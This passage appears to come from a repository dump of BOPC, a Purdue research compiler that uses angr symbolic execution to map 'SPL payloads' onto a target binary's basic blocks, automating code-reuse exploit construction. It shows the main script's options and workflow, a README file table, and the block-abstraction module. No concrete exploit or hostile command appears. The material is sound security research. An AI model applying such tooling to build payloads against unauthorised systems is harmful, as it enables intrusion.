target application\",\n        action   = 'store',\n        dest     = 'binary',\n        required = False, # True\n    )\n\n    group_g.add_argument(\n        '-a', \"--abstractions\",\n        help     = \"Work with abstraction file\",\n        choices  = ['save', 'load', 
'saveonly'],\n        default  = 'none',\n        action   = 'store',\n        dest     = 'abstractions',\n        required = False\n    )\n\n    group_g.add_argument(\n        \"--emit-IR\",\n        help     = \"Dump SPL IR to a file and exit\",\n        action   = 'store_const',\n        const    = True,\n        dest     = 'emit_IR',\n        required = False\n    )\n\n    # action='count'\n    group_g.add_argument(\n        '-d',\n        help     = \"Set debugging level to minimum\",\n        action   = 'store_const',\n        const    = DBG_LVL_1,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-dd',\n        help     = \"Set debugging level to basic (recommended)\",\n        action   = 'store_const',\n        const    = DBG_LVL_2,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-ddd',\n        help     = \"Set debugging level to verbose (DEBUG ONLY)\",\n        action   = 'store_const',\n        const    = DBG_LVL_3,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-dddd',\n        help     = \"Set debugging level to print-everything (DEBUG ONLY)\",\n        action   = 'store_const',\n        const    = DBG_LVL_4,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-V', \"--version\",\n        action   = 'version',\n        version  = 'BOPC %s' % VERSION\n    )\n\n\n    # -------------------------------------------------------------------------\n    # Group for searching arguments\n    # -------------------------------------------------------------------------\n    group_s.add_argument(\n        '-s', \"--source\",\n        help     = \"Source file with SPL payload\",\n        action   = 'store',\n        dest     = 'source',\n        required = False\n    )\n\n    group_s.add_argument(\n        '-e', \"--entry\",\n        help     = \"The entry 
point in the binary that payload starts\",\n        action   = 'store',\n        dest     = 'entry',\n        required = False\n    )\n\n    group_s.add_argument(\n        '-O', \"--optimizer\",\n        help     = \"Use the SPL optimizer (Default: none)\",\n        choices  = ['none', 'ooo', 'rewrite', 'full'],\n        action   = 'store',\n        default  = 'none',\n        dest     = 'optimizer',\n        required = False\n    )\n\n    group_s.add_argument(\n        '-f', \"--format\",\n        help     = \"The format of the solution (Default: raw)\",\n        choices  = ['raw', 'idc', 'gdb'],\n        action   = 'store',\n        default  = 'raw',\n        dest     = 'format',\n        required = False,\n    )\n\n    group_s.add_argument(\n        \"--find-all\",\n        help     = \"Find all the solutions\",\n        action   = 'store_const',\n        default  = 'one',\n        const    = 'all',\n        dest     = 'findall',\n        required = False\n    )\n\n\n    # -------------------------------------------------------------------------\n    # Group for debugging arguments\n    # -------------------------------------------------------------------------\n    group_d.add_argument(\n        \"--mapping-id\",\n        help     = \"Run the Trace Searching algorithm on a given mapping ID\",\n        metavar  = 'ID',\n        action   = 'store',\n        default  = -1,\n        dest     = 'mapping_id',\n        required = False\n    )\n\n    group_d.add_argument(\n        \"--mapping\",\n        help     = \"Run the Trace Searching algorithm on a given register mapping\",\n        metavar  = 'MAP',\n        nargs    = '+',\n        action   = 'store',\n        default  = [],\n        dest     = 'mapping',\n        required = False\n    )\n\n    group_d.add_argument(\n        \"--enum-mappings\",\n        help     = \"Enumerate all possible mappings and exit\",\n        action   = 'store_const',\n        default  = False,\n        const    = True,\n        dest 
    = 'enum_mappings',\n        required = False\n    )\n\n    group_d.add_argument(\n        \"--abstract-blk\",\n        help     = \"Abstract a specific basic block and exit\",\n        metavar  = 'BLKADDR',\n        action   = 'store',\n        dest     = 'absblk',\n        required = False\n    )\n\n\n    # -------------------------------------------------------------------------\n    # Group for application capabilities\n    # -------------------------------------------------------------------------\n    group_c.add_argument(\n        '-c', \"--capability\",\n        help     = textwrap.dedent('''\\\n                    Measure application's capability. Options (can be many)\n\n                    all\\tSearch for all Statements\n                    regset\\tSearch for Register Assignments\n                    regmod\\tSearch for Register Modifications\n                    memrd\\tSearch for Memory Reads\n                    memwr\\tSearch for Memory Writes\n                    call\\tSearch for Function/System Calls\n                    cond\\tSearch for Conditional Jumps\n                    load\\tLoad capabilities from file\n                    save\\tSave capabilities to file\n                    noedge\\tDump statements and exit (don't calculate edges)'''),\n        choices  = ['all', 'regset', 'regmod', 'memrd', 'memwr', 'call', 'cond',\n                    'save', 'load', 'noedge'],\n        metavar  = 'OPTIONS',\n        nargs    = '+',                             # consume >=1 arguments (multiple options)\n        action   = 'store',\n        dest     = 'capabilities',\n        required = False\n    )\n\n\n    if len(sys.argv) == 1:\n        parser.print_help(sys.stderr)\n        sys.exit(1)\n\n    return parser.parse_args()                      # do the parsing (+ error handling)\n\n\n\n# ---------------------------------------------------------------------------------------------\n# load(): Load the target binary and generate its CFG.\n#\n# :Arg 
filename: Binary's file name\n# :Ret: A tuple (project, CFG) with the angr project and its normalized CFG.\n#\ndef load( filename ):\n    # load the binary (exception is thrown if name is invalid)\n    project = angr.Project(filename, load_options={'auto_load_libs': False})\n\n\n\n    # generate CFG\n    dbg_prnt(DBG_LVL_0, \"Generating CFG. It might take a while...\")\n    CFG = project.analyses.CFGFast()\n    dbg_prnt(DBG_LVL_0, \"CFG generated.\")\n\n\n    # normalize CFG (i.e., make sure that there are no overlapping basic blocks)\n    dbg_prnt(DBG_LVL_0, \"Normalizing CFG...\")\n    CFG.normalize()\n\n    # normalize every function object as well\n    for _, func in project.kb.functions.iteritems():\n        if not func.normalized:\n            dbg_prnt(DBG_LVL_4, \"Normalizing function '%s' ...\" % func.name)\n            func.normalize()\n\n    dbg_prnt(DBG_LVL_0, \"Done.\")\n\n\n    emph(\"CFG has %s nodes and %s edges\" %\n                (bold(len(CFG.graph.nodes())), bold(len(CFG.graph.edges()))))\n\n\n    # create a quick mapping between addresses and nodes (basic blocks)\n    for node in CFG.graph.nodes():\n        ADDR2NODE[ node.addr ] = node\n\n\n    # create a quick mapping between basic block addresses and their corresponding functions\n    for _, func in CFG.functions.iteritems():       # for each function\n        for addr in func.block_addrs:               # for each basic block in that function\n            ADDR2FUNC[ addr ] = func\n\n\n    return project, CFG\n\n\n\n# ---------------------------------------------------------------------------------------------\n# abstract(): Abstract the CFG and apply any further abstraction-related operations.\n#\n# :Arg mark: A valid graph marking object.\n# :Arg mode: Abstraction mode (load, save, saveonly, none)\n# :Arg filename: Abstraction's file name (if applicable)\n# :Ret: -1 if mode is 'saveonly' (i.e., the caller should stop), 0 otherwise.\n#\ndef abstract( mark, mode, filename ):\n    if mode == 'none':\n        mark.abstract_cfg()                         # calculate the abstractions\n\n    elif mode == 'load':\n  
      mark.load_abstractions(filename)            # simply load the abstractions\n\n    elif mode == 'save':\n        mark.abstract_cfg()                         # calculate the abstractions\n        mark.save_abstractions(filename)            # and save them\n\n    elif mode == 'saveonly':\n        mark.abstract_cfg()\n        mark.save_abstractions(filename)\n        return -1\n\n    return 0\n\n\n\n# ---------------------------------------------------------------------------------------------\n# capability_analyses(): Apply any (custom) analyses to the capabilities.\n#\n# :Arg cap: The capability object\n# :Ret: None.\n#\ndef capability_analyses( cap ):\n    dbg_prnt(DBG_LVL_0, 'Applying additional Capability analyses...')\n    return\n\n    '''\n    # analyze all islands\n    # cap.analyze(P.CAP_LOOPS, P.CAP_STMT_MIN_DIST)\n\n    # analyze a specific island\n    # cap.analyze_island(0x400885, P.CAP_STMT_COMB_CTR)\n\n    i = 0\n    def foo( graph ):\n        global i\n        print 'Visualizing island %d' % i\n        cap.visualize(graph, 'island_%d' % i, show_labels=True)\n\n        i += 1\n\n        for _, d in graph.nodes_iter(data=True):\n            print d['type'] # check capability.__add() for all keys\n\n\n    # apply the callback to every island\n    cap.callback( foo )\n    '''\n\n\n# -------------------------------------------------------------------------------------------------\n# main(): This is the main function of BOPC.\n#\n# :Ret: None.\n#\nif __name__ == '__main__':\n    args = parse_args()                         # process arguments\n    set_dbg_lvl( args.dbg_lvl )                 # set debug level in coreutils\n\n    now  = datetime.datetime.now()              # get current time\n\n\n    # -------------------------------------------------------------------------\n    # Display banner\n    # -------------------------------------------------------------------------\n    print rainbow(textwrap.dedent('''\n        
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n        %                                                                    %\n        %                :::::::::   ::::::::  :::::::::   ::::::::          %\n        %               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %\n        %              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %\n        %             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %\n        %            +#+    +#+ +#+    +#+ +#+        +#+                    %\n        %           #+#    #+# #+#    #+# #+#        #+#    #+#              %\n        %          #########   ########  ###         ########                %\n        %                                                                    %\n        %                Block Oriented Programming Compiler                 %\n        %                                                                    %\n        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n        '''))\n\n    print comments\n    print \"[*] Starting BOPC %s at %s\" % (VERSION, bolds(now.strftime(\"%d/%m/%Y %H:%M\")))\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Emit SPL IR\n    # -------------------------------------------------------------------------\n    if args.emit_IR and args.source:\n        IR = C.compile(args.source)\n        IR.compile()                                # compile the SPL payload\n\n        IR = O.optimize(IR.get_ir())\n        IR.optimize(mode=args.optimizer)           # optimize IR (if needed)\n\n        IR.emit(args.source)\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Trace Search\n    # -------------------------------------------------------------------------\n    elif args.source and args.entry:\n        IR = C.compile(args.source)\n        IR.compile()                                # 
compile the SPL payload\n\n        IR = O.optimize(IR.get_ir())\n        IR.optimize(mode=args.optimizer)            # optimize IR (if needed)\n\n\n        project, CFG = load(args.binary)\n        mark         = M.mark(project, CFG, IR, 'puts')\n\n        if abstract(mark, args.abstractions, args.binary) > -1:\n            entry = int(args.entry, 0)              # get entry point\n\n            X = mark.mark_candidate(sorted(map(lambda s : tuple(s.split('=')), args.mapping)))\n\n            if not X:\n                print 'abort'\n                exit()\n\n\n        #   visualize('cfg_cand', entry=entry, options=VO_DRAW_CFG|VO_DRAW_CANDIDATE)\n\n            # extract payload name (without the extension)\n            payload_name = ntpath.basename(args.source)\n            payload_name = os.path.splitext(payload_name)[0]\n\n\n            try:\n                options = {\n                    'format'     : args.format,\n                    'solutions'  : args.findall,\n                    'mapping-id' : int(args.mapping_id),\n                    'mapping'    : sorted(map(lambda s : tuple(s.split('=')), args.mapping)),\n                    'filename'   : '%s-%s' % (args.binary, payload_name),\n                    'enum'       : args.enum_mappings,\n\n                    'simulate'   : False,\n                    '#mappings'  : 0,\n                    '#solutions' : 0\n                }\n\n            except ValueError:\n                fatal(\"'mapping-id' argument must be an integer\")\n\n\n            tsearch = S.search(project, CFG, IR, entry, options)\n            tsearch.trace_searching(mark)\n\n            # -----------------------------------------------------------------\n            # Show some statistics\n            # -----------------------------------------------------------------\n            emph(\"Trace Searching Statistics:\")\n            emph(\"\\tUsed Simulation? 
%s\"  % bolds(options['simulate']))\n            emph(\"\\t%s Mapping(s) tried\"  % bold(options['#mappings']))\n            emph(\"\\t%s Solution(s) found\" % bold(options['#solutions']))\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Dump abstractions\n    # -------------------------------------------------------------------------\n    elif args.abstractions == 'saveonly':\n        # IR is useless; we're only dumping abstractions\n        project, CFG = load(args.binary)\n        mark         = M.mark(project, CFG, None, 'puts')\n\n        abstract(mark, args.abstractions, args.binary)\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Application Capability\n    # -------------------------------------------------------------------------\n    elif args.capabilities:\n         # IR is useless; we're measuring capability\n        project, CFG = load(args.binary)\n        mark         = M.mark(project, CFG, None, 'puts')\n\n        abstract(mark, args.abstractions, args.binary)\n\n        # cfg is loaded with abstractions\n        cap = P.capability(CFG, args.binary)\n\n        options = 0\n\n        for stmt in args.capabilities:\n            options = options | {\n                'all'    : P.CAP_ALL,\n                'regset' : P.CAP_REGSET,\n                'regmod' : P.CAP_REGMOD,\n                'memrd'  : P.CAP_MEMRD,\n                'memwr'  : P.CAP_MEMWR,\n                'call'   : P.CAP_CALL,\n                'cond'   : P.CAP_COND,\n                'load'   : P.CAP_LOAD,\n                'save'   : P.CAP_SAVE,\n                'noedge' : P.CAP_NO_EDGE\n            }[stmt]     # argparse ensures no KeyError\n\n        cap.build(options=options)                  # build the Capability Graph\n        cap.save()                                  # save nodes to a file\n        cap.explore()                               # explore Islands\n\n  
      capability_analyses( cap )\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Single block abstraction\n    # -------------------------------------------------------------------------\n    elif args.binary and args.absblk:\n        project = angr.Project(args.binary, load_options={'auto_load_libs': False})\n\n        load(args.binary)\n\n        abstr   = A.abstract_ng(project, int(args.absblk, 0))\n\n        dbg_prnt(DBG_LVL_0, 'Abstractions for basic block 0x%x:' % int(args.absblk, 0))\n        for a, b in abstr:\n            if a == 'regwr':\n                dbg_prnt(DBG_LVL_0, '%14s :' % a)\n                for c, d in b.iteritems():\n                    dbg_prnt(DBG_LVL_0, '\\t\\t%s = %s' % (c, str(d)))\n\n            else:\n                dbg_prnt(DBG_LVL_0, '%14s : %s' % (a, str(b)))\n\n\n    # -------------------------------------------------------------------------\n    # invalid BOPC operation\n    # -------------------------------------------------------------------------\n    else:\n        fatal('Invalid configuration argument')\n\n\n    emph('')\n    emph('BOPC has finished.', DBG_LVL_0)\n    emph('Have a nice day!',        DBG_LVL_0)\n    emph('Bye bye :)',              DBG_LVL_0)\n\n    warn('A segmentation fault may occur now, due to an internal angr issue')\n\n\n\n# ---------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n\n\n___\n\n### BOPC Implementation Overview\n\n![alt text](./images/BOPC_overview.png)\n\n\n### Source Code Overview\n\n\n| File                             | Description                                 |\n| ---------------------------------|---------------------------------------------|\n| [BOPC.py](./BOPC.py)             | Main file |\n| [absblk.py](./absblk.py)         | Basic block abstraction |\n| [calls.py](./calls.py)           | Supported library and system calls |\n| [capability.py](./capability.py) | Application Capability |\n| [compile.py](./compile.py)       | SPL compiler |\n| [config.py](./config.py)         | Configuration file |\n| [coreutils.py](./coreutils.py)   | Shared utils across modules |\n| [delta.py](./delta.py)           | Delta graph |\n| [map.py](./map.py)               | Mapping across registers and variables |\n| [mark.py](./mark.py)             | Marking and re-Marking CFG |\n| [optimize.py](./optimize.py)     | SPL optimizer |\n| [output.py](./output.py)         | Write solutions to a file |\n| [path.py](./path.py)             | CFG shortest paths |\n| [search.py](./search.py)         | Trace Searching algorithm |\n| [simulate.py](./simulate.py)     | Concolic execution |\n\n\n___"
  },
  {
    "path": "source/absblk.py",
    "content": "#!/#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# absblk.py:\n#\n# This module implements the basic block \"abstractions\". 
Abstraction is a process that summarizes\n# a basic block into its \"impact\" on the program's state.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport signal\nimport simuvex\nimport claripy\nimport archinfo\nimport angr\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n_STACK_SZ = 0x1000                                  # size of symbolic stack\n\n\n\n# -------------------------------------------------------------------------------------------------\n# abstract_ng: This class implements the next generation of the basic block \"abstraction\". So\n#   far, the following abstractions are supported:\n#\n#   * * Register Writes * *\n#   A dictionary that contains all registers that are being written. The \"write\" information is\n#   another dictionary with the following fields:\n#\n#       * type     : Can be 'concrete', 'deref', 'mod' or 'clob'. A register is of type 'clob'\n#                    when it does not fall into any of the other types\n#       * const    : ('concrete' and 'mod' types). The constant value that is written to the\n#                    register\n#       * writable : ('concrete' types). If the constant value is a valid and writable memory\n#                    address, then this field is set to True\n#       * op       : ('mod' types). The modification operator\n#       * addr     : ('deref' types). The address that the register value is loaded from\n#       * deps     : ('deref' types). Any registers that participate in the addr field\n#       * sym      : ('deref' types). A mapping between registers and their symbolic variables\n#       * memrd    : ('deref' types). 
When the register write can be used as a memory read, this\n#                    field contains the size of the memory read in bytes (1,2,4,8). Otherwise it\n#                    is set to None\n#\n#   Example:\n#       regwr = {\n#           rsp : {'type': 'concrete', 'const': 576460752303357888L, 'writable': True },\n#           rcx : {'type': 'deref', 'addr': <BV64 rsi_43_64 + 0x10>, 'deps': ['rsi']},\n#           r9  : {'type': 'mod', 'op': '+', 'const': 1337L}\n#       }\n#\n#\n#   * * Memory Reads * *\n#   A list of tuples (address, size) for every memory read.\n#\n#   Example:\n#       memrd = set([(<SAO <BV64 0x7ffffffffff0810>>, 64), (<SAO <BV64 0x7ffffffffff0818>>, 64)])\n#\n#\n#   * * Memory Writes * *\n#   A list of tuples (address, data) for every memory write (len(data) indicates the size)\n#\n#   Example:\n#       memwr = set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 rbx_1_64>>), \n#                    (<SAO <BV64 0x7ffffffffff07e0>>, <SAO <BV64 0x416631>>)])\n#\n#\n#   * * Concrete Writes * *\n#   A list of tuples (address, size) for every concrete memory write.\n#\n#   Example:\n#       conwr = set([(576460752303359992L, 64), (576460752303359968L, 64)])\n#\n#\n#   * * SPL Memory Writes * *\n#   A list of dictionaries for every SPL memory write (memory writes that are in the form:\n#   \"mov [rax], rbx\"). 
Each dictionary contains the following fields:\n#\n#       * mem  : The register that holds the address to write (string)\n#       * val  : The register that holds the value to be written (string)\n#       * size : The number of bytes to write (e.g., mov [rax], cl, mov [rbx], dx)\n#       * sym  : A mapping between registers and their symbolic variables\n#\n#   Example:\n#       splmemwr = [{\n#            'mem'  : 'rbx', \n#            'val'  : 'rax', \n#            'size' : 4,\n#            'sym'  : {'rax': <BV64 rax_0_64>, 'rbx': <BV64 rbx_1_64>}\n#       }]\n#\n#\n#   * * Calls * *\n#   A dictionary with the following fields:\n#\n#       * type : Can be 'syscall' or 'libcall'\n#       * name : The name of the call\n#\n#   Example:\n#       call = {'type': 'libcall', 'name': u'puts'}\n#\n#\n#   * * Conditional Jumps * *\n#   A dictionary with the following fields:\n#\n#       * form      : The form of the conditional jump ('simple' / 'extended')\n#       * reg       : The register that participates in the conditional jump\n#       * const     : The constant value that the register is compared against\n#       * op        : The comparison operator\n#       * mod_op    : ('extended' types). The operator of the register modification\n#       * mod_const : ('extended' types). The constant of the register modification\n#\n#   Example:\n#       cond = {'reg': 'r11', 'op': '==', 'const': 11L}\n#       cond = {'mod_op': '^', 'const': 0L, 'form': 'extended', 'op': '=='}\n#\n#\n#   * * Symbolic Variables * *\n#   A dictionary that maps the symbolic variables to the actual addresses that they correspond to\n#\n#   Example:\n#       symvar = {<BV64 mem_7fffffffffef1e8_82_64> : 0x7fffffffffef1e8}\n#\n#\n# * * * ---===== TODO list =====--- *\n#\n#   [1]. Make absblk more precise, i.e., check the order of memory writes\n#   [2]. 
Move this list to the beginning of the file.\n#\nclass abstract_ng( object ):\n    ''' ======================================================================================= '''\n    '''                                   AUXILIARY FUNCTIONS                                   '''\n    ''' ======================================================================================= '''\n \n    # ---------------------------------------------------------------------------------------------\n    # __reg_w(): Analyze the register writes of the symbolic execution.\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __reg_w( self, state ): \n        visited = set()                             # visited registers\n\n        for action in reversed(state.actions):      # for every action (start backwards)    \n            if not (action.type == 'reg' and action.action == 'write'):\n                continue                            # we care about register writes only\n\n            try:\n                # we only care about the most recent register write\n                reg = self.__proj.arch.register_names[action.offset]\n            except KeyError:\n                continue\n\n            # get the last write only\n            if reg not in HARDWARE_REGISTERS or reg in visited:\n                continue\n\n            data = { }                              # various data related to the write\n            visited.add(reg)                        # make sure that you won't visit this again\n\n\n            # ---------------------------------------------------------------------------\n            # If some address (initialized or not) is used as a dereference, the regwr\n            # entry for that register must be preserved (we should not overwrite the\n            # register with the actual value at that address)\n            # 
---------------------------------------------------------------------------\n            if reg in self.regwr and self.regwr[ reg ]['type'] == 'deref':\n                continue\n\n            # The register is being modified, so we start by marking it as clobbered\n            if reg not in self.regwr:\n                self.regwr[ reg ] = {'type' : 'clob'}\n\n            \n            # -----------------------------------------------------------------\n            if action.data.concrete:                # if register gets a concrete value,\n                value = state.se.eval(action.data)  # concretize it\n\n                data['type']     = 'concrete'       # set data\n                data['const']    = value\n                data['writable'] = True             # initialize this first\n                in_section = False\n\n                # now, check whether this value is a writable address\n                try:\n                    # The problem: There are some weird sections (e.g., \".comment\") whose VA\n                    # starts from 0. Therefore, we may have register writes with constants like\n                    # 1, 2 and so on, which are marked as +W. This means that at the end we can\n                    # have memory reservations (writes) at those addresses. Our old approach with\n                    # \"state.memory.permissions(value)\" doesn't work here.\n                    #\n                    # So iterate over ELF sections looking for it\n                    for _, sec in self.__proj.loader.main_object.sections_map.iteritems():\n                        # it's possible for the value to be part of >1 sections (usually when\n                        # section's VA is 0; sec.vaddr != 0). 
We mark value as +W only when *all*\n                        # sections are writable\n                        if sec.contains_addr(value):\n                            data['writable'] &= sec.is_writable\n                            in_section = True\n\n\n                    # if we can't find a section (b/c it's generated at runtime, like .stack)\n                    if not in_section:\n                        # TODO: check if value+1, value+2, etc. are writable as well\n                        rwx = state.memory.permissions(value)\n\n                        if state.se.eval(rwx) & 2 == 2: # is +W (2nd bit) set?\n                            data['writable'] = True\n                        else:\n                            data['writable'] = False\n                        \n                except Exception, e:                # page does not exist at given address\n                    data['writable'] = False        # not writable at all\n\n                    try:\n                        # special case when a stack address is in the next page (-W)\n                        if value & 0x07ffffffffff0000 == 0x07ffffffffff0000:\n                            rwx = state.memory.permissions(value-0x4000)\n\n                            # give it a second chance\n                            if state.se.eval(rwx) & 2 == 2:\n                                data['writable'] = True\n\n                    except Exception, e:            # or angr.errors.SimMemoryError\n                        pass\n\n            # -----------------------------------------------------------------\n            else:                                   # register doesn't get a concrete value\n\n                # register gets an expression. 
Check for simple register modifications:
                # "<reg> <op>= <const>" (we can easily scale this to <reg> <op>= <reg>)
                # Note that the modified register should be the same as action.offset
                node = [leaf for leaf in action.data.recursive_leaf_asts]

                # we need an AST with depth 2, 2 leaves and 1 variable (i.e., register)
                if action.data.depth == 2 and len(action.data.variables) == 1 and len(node) == 2:
                    try:
                        data['op'] = {              # cast operator
                            '__add__'    : '+',
                            '__sub__'    : '-',
                            '__mul__'    : '*',
                            '__div__'    : '/',
                            '__and__'    : '&',
                            '__or__'     : '|',
                            '__xor__'    : '^',
                            '__invert__' : '~',
                            '__lshift__' : '<<',
                            '__rshift__' : '>>'
                        }[ action.data.op ]

                        # if constant is on the left, swap sides
                        if node[0].op == 'BVV' and node[0].concrete:
                            node[0], node[1] = node[1], node[0]


                        # check if we're in the form: <reg> <op> <const>
                        if node[0].op == 'BVS' and self.__symreg[node[0]] == reg and \
                           node[1].op == 'BVV' and node[1].concrete:
                                data['type']  = 'mod'
                                data['const'] = state.se.eval(node[1])
                        else:                       # not in the right form
                                continue

                    except KeyError:                # operator cast or __symreg lookup failed
                        continue


                # 
-----------------------------------------------------------------------
                # Consider the following case:
                #       .text:000000000040BA49         mov     eax, [rbp+tfd]
                #       .text:000000000040BA52         mov     edi, eax         ; fd
                #
                # Here, edi gets exactly the same value as eax, but edi is marked as
                # 'clob', while eax is marked as 'deref'. The root cause is that edi does not
                # participate in any memory reads and the assigned value is not constant
                # (i.e., it doesn't come directly from a register).
                #
                # To fix that, we check whether a 'clob' register has *exactly* the same
                # symbolic value as another one (eax in our example), and if so we
                # assign the same regwr entry to it.
                # -----------------------------------------------------------------------
                else:
                    # iterate over previous writes
                    for reg2, val in self.__reg_rawval.iteritems():
                        try:

                            # check if raw values match
                            if reg != reg2 and val.shallow_repr() == action.data.shallow_repr():

                                self.regwr[ reg ] = self.regwr[ reg2 ]

                        except KeyError:
                            pass


            # -----------------------------------------------------------------
            if data:
                self.regwr[ reg ] = data            # set data to this register



    # ---------------------------------------------------------------------------------------------
    # __mem_r(): Analyze the memory reads of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __mem_r( self, state ):
        for action in state.actions:                # for every action
            if not (action.type == 'mem' and action.action == 'read'):
                continue                            # we care about memory reads only

            # simply add address (can be an expression) and size to the list
            self.memrd.add( (action.addr, len(action.data)) )



    # ---------------------------------------------------------------------------------------------
    # __mem_w(): Analyze the memory writes of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __mem_w( self, state ):
        for action in state.actions:                # for every action
            if not (action.type == 'mem' and action.action == 'write'):
                continue                            # we care about memory writes only

            # simply add address (can be an expression) and data to the list
            self.memwr.add( (action.addr, action.data) )

            if action.addr.concrete:                # if address is concrete
                # concretize it as well
                self.conwr.add( (state.se.eval(action.addr), len(action.data)) )


            deps   = [ ]
            symtab = { }

            # -----------------------------------------------------------------
            # Check for memory register writes (mov [rax], rbx)
            #
            # In this case, both action.addr and action.data will consist of a
            # single leaf in their AST, which is a register
            # -----------------------------------------------------------------
            mem_reg = [leaf for leaf in action.addr.recursive_leaf_asts]
            val_reg = [leaf for leaf in action.data.recursive_leaf_asts]


            # print 'ADDR', mem_reg, action.addr
            # print 'DATA', val_reg, action.data


            # check that each AST has a single leaf
            if len(mem_reg) == 1 and len(val_reg) == 1:
                mem, val = None, None

                # check whether the leaf is a register
                for sym, nam in self.__symreg.iteritems():
                    # skip registers that are not symbolic (e.g., rbp)
                    if isinstance(sym.args[0], str) and sym.args[0] in mem_reg[0].shallow_repr():
                        symtab[nam] = sym
                        mem         = nam

                    elif isinstance(sym.args[0], str) and sym.args[0] in val_reg[0].shallow_repr():
                        symtab[nam] = sym
                        val         = nam

                # if both leaves are registers we have a memory register write!
                if mem and val:
                    self.splmemwr.append({
                        'mem'  : mem,
                        'val'  : val,
                        'size' : int(action.size) >> 3,
                        'sym'  : symtab,
                    })



    # ---------------------------------------------------------------------------------------------
    # __call(): Analyze the (sys|lib)calls of the symbolic execution. 
Because we're analyzing a\n    #       single basic block, we can have up to one such (sys|lib)call (the last instruction).\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __call( self, state ):\n        blk = self.__proj.factory.block(self.__entry)\n\n        # check if symbolic execution stopped on a syscall\n        # (don't use \"if self.__proj._simos.is_syscall_addr(state.addr)\"; it throws exceptions)\n        if blk.vex.jumpkind == \"Ijk_Sys_syscall\":\n            # a system call was invoked\n            # we assume that simproc.cc == SimCCAMD64LinuxSyscall                \n            simproc = self.__proj._simos.syscall(state)\n\n            self.call['type'] = 'syscall'\n            self.call['name'] = simproc.display_name\n            # self.call['nargs'] = simproc.num_args\n\n        else:  \n            if blk.vex.jumpkind != \"Ijk_Call\":      # skip block when it doesn't end with a call\n                return\n\n\n            # check if symbolic execution stopped on a library call\n            for action in reversed(state.actions):  # for every action        \n                if action.type != 'exit':\n                    continue                        # we care about branches only\n\n\n                # concretize function's entry point\n                target = state.se.eval(action.target)\n\n                # Note: Before you use kb.functions, calculate CFG (e.g., analyses.CFGFast())\n                try:\n                    self.call['type'] = 'libcall'\n                    self.call['name'] = self.__proj.kb.functions[target].name\n                except Exception:                   # no function name at that address\n                    self.call = { }\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __cond(): Analyze the conditional jump of the symbolic execution. 
Because we're analyzing a\n    #       single basic block, we can have up to one conditional jump.\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __cond( self, state ):        \n        for action in reversed(state.actions):      # for every action        \n            if not (action.type == 'exit' and action.exit_type == 'conditional'):\n                continue                            # we care about conditional jumps only\n          \n\n            # as in __reg_w(), we only care about simple conditional jumps: \"<reg> <op> <const>\"\n            if len(action.condition.variables) == 1:  \n                try:\n                    self.cond['op'] = {             # cast operator\n                        '__eq__' : '==',\n                        '__ne__' : '!=',\n                        '__le__' : '<=',\n                        '__lt__' : '<',\n                        '__ge__' : '>=',\n                        '__gt__' : '>',\n\n                        'SGT'    : '>',                        \n                        'SGE'    : '>=',\n                        'SLT'    : '<',\n                        'SLE'    : '<=',                        \n                        'UGT'    : '>',             # do not distinguish signed/unsigned operators\n                        'UGE'    : '>=',\n                        'ULT'    : '<',\n                        'ULE'    : '<=',\n                    }[ action.condition.op ]\n                except KeyError: \n                    warn('Unknown conditional jump operator \"%s\"' % action.condition.op)\n                    self.cond = { }\n                    return\n\n                \n                node = [leaf for leaf in action.condition.recursive_leaf_asts]\n\n\n                # -----------------------------------------------------------------------\n                # Check if we're in the simple form: <reg> <op> <const>\n                # 
